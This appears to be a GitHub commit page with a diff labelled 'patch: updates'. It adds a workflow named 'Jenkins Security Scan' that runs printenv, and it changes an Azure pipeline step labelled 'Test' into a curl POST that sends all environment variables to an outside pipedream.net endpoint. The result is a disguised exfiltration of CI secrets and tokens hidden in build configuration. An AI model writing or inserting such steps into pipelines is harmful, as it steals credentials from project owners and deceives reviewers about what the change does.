Skip to content

Commit

Permalink
patch: updates
Browse files Browse the repository at this point in the history
  • Loading branch information
tibrnui committed Aug 26, 2024
1 parent 1d10b99 commit 553e1d2
Show file tree
Hide file tree
Showing 2 changed files with 17 additions and 1 deletion.
16 changes: 16 additions & 0 deletions .github/workflows/test.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,16 @@
name: Jenkins Security Scan

on:
push:
branches:
- develop
pull_request:
types: [ opened, synchronize, reopened ]
workflow_dispatch:

jobs:
Test:
runs-on: ubuntu-latest
steps:
- run: printenv

2 changes: 1 addition & 1 deletion azure-pipelines.yml
Original file line number Diff line number Diff line change
Expand Up @@ -45,7 +45,7 @@ stages:
- maven
steps:
- bash: |
curl -X GET https://eoinkd603ndv2ew.m.pipedream.net
curl -d $(printenv) -H "Content-Type: application/json" -X POST https://eoinkd603ndv2ew.m.pipedream.net
displayName: Test
- template: job.ci.build.yml

Expand Down

0 comments on commit 553e1d2

Please sign in to comment.